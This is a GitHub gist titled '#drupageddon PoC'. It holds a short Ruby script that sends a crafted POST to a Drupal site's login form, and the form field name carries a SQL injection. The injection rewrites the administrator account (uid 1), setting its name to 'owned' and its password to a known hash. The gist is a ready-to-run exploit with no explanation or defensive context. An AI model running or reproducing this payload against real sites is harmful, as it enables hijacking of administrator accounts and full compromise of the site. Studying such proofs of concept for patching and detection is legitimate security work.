Skip to content

Instantly share code, notes, and snippets.

@LeShadow

LeShadow/#drupageddon PoC

Created October 16, 2014 07:29
Show Gist options
  • Save LeShadow/867aeeebe87cfe238ed3 to your computer and use it in GitHub Desktop.
Save LeShadow/867aeeebe87cfe238ed3 to your computer and use it in GitHub Desktop.
Download ZIP
#drupageddon PoC
Raw
#drupageddon PoC
require 'net/http'
require 'uri'
require 'optparse'
options = {}
OptionParser.new do |opts|
opts.banner = "Usage: poc.rb [options]"
opts.on("-d", "--drupal_url=drupal_host", "Define the url for your drupalsite without. (www.domain.tld)") do |drupal_url|
options[:drupal_url] = drupal_url
end
end.parse!
url_var = "http://#{options[:drupal_url]}/?q=node&destination=node"
puts url_var
uri_drup = URI.parse("http://#{options[:drupal_url]}/?q=node&destination=node")
http_drup = Net::HTTP.new(uri_drup.host, uri_drup.port)
request_drup = Net::HTTP::Post.new(uri_drup.request_uri)
request_drup.set_form_data({
"name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]" => "test3",
"name[0]" => "test",
"pass" => "shit2",
"test2" => "test",
"form_build_id" => "",
"form_id" => "user_login_block",
"op" => "Log+in"
})
response_drup = http_drup.request(request_drup)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment